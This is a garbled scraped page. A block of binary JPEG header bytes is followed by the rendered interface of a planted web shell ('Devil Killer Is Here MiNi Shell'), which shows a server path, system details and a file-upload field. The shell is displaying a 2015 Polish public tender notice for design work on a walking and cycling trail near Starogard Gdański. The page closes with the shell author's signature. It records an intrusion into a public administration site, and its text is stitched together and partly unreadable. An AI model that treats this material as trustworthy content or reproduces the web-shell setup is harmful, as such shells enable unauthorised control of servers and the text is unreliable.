JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150112/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150112/6850-N-2015.html

<p class="kh_header"><b>Starogard Gdański: Dokumentacja techniczna na wykonanie szlaku przyrodniczo - turystyczno - rekreacyjnego po terenie dawnego szlaku kolejowego 
od Starogardu Gd. w kierunku Kręga</b><br>
<b>Numer ogłoszenia: 6850 - 2015; data zamieszczenia: 12.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Starogardzkiego , ul. Kościuszki 17, 83-200 Starogard Gdański, woj. pomorskie, tel. 58 767 35 00, faks 58 767 35 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatstarogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja techniczna na wykonanie szlaku przyrodniczo - turystyczno - rekreacyjnego po terenie dawnego szlaku kolejowego 
od Starogardu Gd. w kierunku Kręga.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> INFORMACJE OGÓLNE:

Zamówienie jest realizowane w ramach projektu pn. Starogardzki Miejski Obszar Funkcjonalny - nowy wymiar partnerstwa na rzecz rozwoju współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego, Program Operacyjny Pomoc Techniczna 2007 - 2013. Projekt realizowany jest w partnerstwie obejmującym następujące jednostki samorządu terytorialnego: Powiat Starogardzki, Gminę Miejską Starogard Gdański, Gminę Starogard Gdański i Gminę Bobowo. 
Wykonawca jest zobowiązany do realizacji Zamówienia zgodnie z obowiązującymi wytycznymi dotyczącymi POPT 2007 - 2013. W szczególności Wykonawca zobowiązany jest do stosowania logotypów programu i Unii Europejskiej oraz informowania o współfinansowaniu Zamówienia ze środków Unii Europejskiej.
Wykonawca przeniesie na Zamawiającego tj. Lidera Projektu majątkowe prawa autorskie z możliwością ich przekazania na rzecz Partnerów Projektu do całości prac 
i dokumentów powstałych w wyniku realizacji zamówienia, w zakresie rozporządzania nimi i korzystania z nich przez czas nieoznaczony na wszystkich polach eksploatacji.

1. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na cele realizacji projektu pn. Zachowanie wartości przyrodniczych i krajobrazowych korytarza ekologicznego doliny Wierzycy w zakresie wykonania zadania pn. Projekt budowy traktu spacerowo- rowerowego na trasie Krąg- Starogard Gd .  Przedsięwzięcie ma na celu zaprojektowanie traktu spacerowo - rowerowego na odcinku byłej trasy kolejowej Żabno - Krąg , o długości ok. 2000,00 mb wraz z miejscami parkingowymi, platformami widokowymi i miejscem piknikowym.
1.1 Zakres zamówienia obejmuje:
- Część projektową (opisową i rysunkową), branże: 
a. drogową, z uwzględnieniem przebiegu ścieżki rowerowej przez nieczynny most kolejowy, 
b. sanitarną, 
c. elektryczną,
d .teletechniczną;
- Część kosztową; 
- Specyfikację techniczną wykonania i odbioru robót;   
- Wypisy z rejestru gruntów;
- Przygotowanie wniosku w celu uzyskania decyzji pozwolenia na budowę;
- Przygotowanie dokumentacji niezbędnej do uzyskania decyzji o środowiskowych uwarunkowaniach na realizację przedsięwzięcia jeżeli wynika taka konieczność z obowiązujących przepisów, obejmującej czynności do wykonania Karty Informacyjnej Przedsięwzięcia.;
- Opracowanie map do celów projektowych;
- Projekt stałej i tymczasowej organizacji ruchu.

1.1.1 Część projektowa (opisowa i rysunkowa) powinna  składać się z następujących opracowań:
a) Projekt koncepcyjny - 2 egz. ( 3 warianty do wyboru)
b) Wielobranżowy projekt budowlano-wykonawczy w 5 egz. wraz z płytą CD (pliki 
z rozszerzeniem .pdf)
c) Specyfikacje techniczne wykonania i odbioru robót z podziałem na poszczególne branże, w 2 egz. oraz na płycie CD (pliki z rozszerzeniem .pdf)

1.1.2 Część kosztowa powinna składać się z:
a) Kosztorysu inwestorskiego sporządzonego w oparciu o KNR (w przypadku zmiany przepisów w oparciu o metody i podstawy sporządzenia kosztorysów inwestorskich określonych w aktualnych przepisach obowiązujących w dniu przekazywania kompletnej dokumentacji) w 1 egz. oraz na płycie CD (pliki z rozszerzeniem .pdf);
b) Przedmiaru robót, w układzie jednostkowym, z odniesieniem do pozycji specyfikacji technicznej w 1 egz. oraz na płycie CD (pliki z rozszerzeniem .pdf).

1.1.3 Opracowania muszą być zgodne z:
- Rozporządzeniem Ministra   Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. 
-  Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3 listopada 1998  r. w sprawie szczegółowego zakresu i formy projektu budowlanego 
- Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. 
1.1.4  Wykonawca wykona projekt łącznie z: 
- opiniami, uzgodnieniami i sprawdzeniami w zakresie wynikającym z właściwych przepisów, 
- stosownymi obliczeniami oraz wykazem właścicieli gruntów objętych zakresem projektowania,
- badaniami geotechnicznymi w zakresie niezbędnym do potrzeb opracowania dokumentacji,
- wypisami z rejestru gruntów,
- pisemnym oświadczeniem, iż dostarczony projekt jest wykonany zgodnie z umową oraz, że zostaje wydany w stanie kompletnym z punktu widzenia celu, któremu ma służyć, 
- pisemnym oświadczeniem, iż dostarczony projekt jest wolny od jakichkolwiek wad fizycznych i od wad prawnych, 
Wykaz opracowań oraz pisemne oświadczenia, o których mowa, odpowiednio  stanowią integralną część przedmiotu odbioru zadania.

1.2 Ustalenia szczegółowe dotyczące przedmiotu zamówienia:
- lokalizacja - na nasypie kolejowym (własność PKP), wg wskazań projektanta - dotyczy pozostałych nieruchomości, 
- planuje się początek projektowanego traktu w miejscu skrzyżowania drogi powiatowej nr 2706 G - dz. nr 247/2 i 255 obręb ewid. Krąg,  z byłym torowiskiem - dz. nr 256 i 246/3  obręb ewid. Krąg, gm. Starogard Gdański.
- zakończenie projektowanego odcinka będzie w miejscu, w którym torowisko przecina granicę administracyjną Gminy Starogard Gd. z  Miastem Starogard Gd. Jest to miejsce skrzyżowania byłego torowiska - dz. nr 2 obręb ewid. Żabno z ul. Świętojańską - dz. nr 269/1 obręb ewidencyjny Miasto Starogard Gdański.
- planuje się ścieżkę dla ruchu pieszego oraz rowerowego dwukierunkowego, o następujących wymiarach: szerokość 3,5 - 4,0 m, długość ok. 2000,00mb.
- parkingi samochodowe:  początek trasy -  parking na ok. 20 samochodów osobowych, zakończenie trasy - parking na ok. 5 samochodów, 
- parkingi rowerowe: na początkowym parkingu samochodowym - na min. 15 rowerów, na końcowym parkingu samochodowym - na min. 5 rowerów, przy platformach widokowych na min. 10 rowerów, 
- platformy widokowe: w okolicy istniejącego mostu kolejowego, skierowane w  stronę północno - wschodnią oraz południowo - zachodnią doliny rzeki Wierzyca,
- należy przewidzieć zaprojektowanie schodów prowadzących z platformy widokowej do rzeki Wierzyca, 
- infrastruktura - oświetlenie parkowe, ławki parkowe, z uwagi na występujące na trasie skarpy uwzględnić bariery drogowe lub słupki z elementami odblaskowymi, oznakowanie traktu, tablice dydaktyczne, miejsce piknikowe z 4 stołami pod wiatą.
- oświetlenie: wzdłuż ścieżki rowerowej oraz w miejscach parkingowych,
- kanał technologiczny na ścieżce rowerowej: należy zaprojektować tylko w przypadku, jeżeli wynika to z obowiązujących przepisów,
- most kolejowy: przed przystąpieniem do projektowania należy dokonać oceny technicznej obiektu mostowego,
- technologia: przewiduje się nawierzchnię z masy bitumicznej. Na części trasy stwierdza się istniejącą podbudowę z tłucznia kamiennego. Należy rozważyć możliwość nałożenia tylko 2 warstw masy bitumicznej: wiążącej i ścieralnej. 
Uwaga nr 1 :  Gmina Starogard Gdański jest w trakcie załatwiania przejęcia - przekazania nieruchomości gruntowych, pod projektowany trakt,  od Polskich Kolei Państwowych. Na etapie projektowania należy zwrócić się do PKP o prawo do dysponowania nieruchomością w celu wykonania dokumentacji technicznej dla zadania pn. Projekt budowy traktu spacerowo- rowerowego na trasie Krąg- Starogard Gd. 
Uwaga nr 2 : Projekt opisywany stanowi pierwszą część całości. Na całość składa się trasa przyrodnicza po terenie Gminy Starogard Gdański (opisywany odcinek) oraz druga część biegnie po terenie Miasta Starogard Gdański i będzie realizowana przez Miasto Starogard Gdański. Należy ujednolicić oba projekty, tak aby były ze sobą spójne, ponadto trzeba uwzględnić i uzgodnić ostatecznie z miastem miejsce połączenia obu tras w jedną całość.

1.3  Realizacja przedmiotu zamówienia: 
Przedmiot zamówienia będzie realizowany w 3 etapach. 
ETAP  I   Projekt koncepcyjny : realizacja do 4 tygodni od dnia podpisania umowy
ETAP II  Projekt budowlano - wykonawczy, prawidłowo wypełniony wniosek w celu uzyskania decyzji pozwolenia na budowę: realizacja do  16 tygodni od dnia podpisania umowy
ETAP  III Specyfikacje Techniczne Wykonania i Odbioru Robót , kosztorysy i przedmiary budowlane, projekt tymczasowej i stałej organizacji ruchu: realizacja do 15.06.2015r.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-8, 71.20.00.00-0, 71.22.00.00-6, 71.24.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia powyższy warunek jeżeli w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, Wykonawca zrealizował: 
-co najmie jedną usługę polegającą na opracowaniu dokumentacji technicznej obejmującej swym zakresem projekt ścieżki rowerowej o nawierzchni bitumicznej i długości co najmniej 1,0 km oraz załączy dowody, że została ona wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenie niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności i informację o podstawie do dysponowania tymi osobami, a mianowicie: posiadającymi uprawnienia budowlane doprojektowania w branżach: 
- drogowej, 
- sanitarnej, 
- elektrycznej 
- teletechnicznej 
wraz ze wskazaniem osoby, która będzie pełniła funkcję wiodącego projektanta, informacją na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia, podstawą do dysponowania oraz  oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Dokumenty potwierdzające uprawnienia osób podpisujących ofertę Wykonawcy do działania w jego imieniu (w tym także pełnomocnictwa), o ile uprawnienia te nie wynikają z dokumentów rejestrowych. 
2)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia. 
Pełnomocnictwa powinny zostać złożone w formie oryginału albo w formie kserokopii notarialnie poświadczonej za zgodność z oryginałem. 
3) Pisemne zobowiązanie bądź inny właściwy dokument innych podmiotów, o których mowa w art. 26 ust. 2b ustawy, poświadczający oddanie do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, 
w przypadku, gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu będzie polegał na osobach zdolnych do wykonania zamówienia tych podmiotów - wg wzoru - załącznik nr 6 do siwz (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania usługi - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących  przypadkach: zmiana przepisów dotyczących płatności za prawidłową realizację zamówienia; zmiana podatku VAT
2)Inne zmiany: w zakresie zmiany kluczowego personelu wykonawcy, za uprzednią zgodą zamawiającego, akceptującą kandydata na to stanowisko; w zakresie podwykonawstwa za uprzednią zgodą zamawiającego: powierzenie podwykonawcom innej części prac niż wskazana w ofercie wykonawcy, zmiana podwykonawcy na etapie realizacji prac projektowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiatstarogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Starogardzie Gdańskim,
ul. Kościuszki 17,
83-200 Starogard Gdański, pokój 004.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2015 godzina 09:00, miejsce: Starostwo Powiatowe w Starogardzie Gdańskim,
ul. Kościuszki 17,
83-200 Starogard Gdański, Punkt informacyjny, pokój 09 - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu pn. Starogardzki Miejski Obszar Funkcjonalny - nowy wymiar partnerstwa na rzecz rozwoju współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego, Program Operacyjny Pomoc Techniczna 2007 - 2013. Projekt realizowany jest w partnerstwie obejmującym następujące jednostki samorządu terytorialnego: Powiat Starogardzki, Gminę Miejską Starogard Gdański, Gminę Starogard Gdański i Gminę Bobowo..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com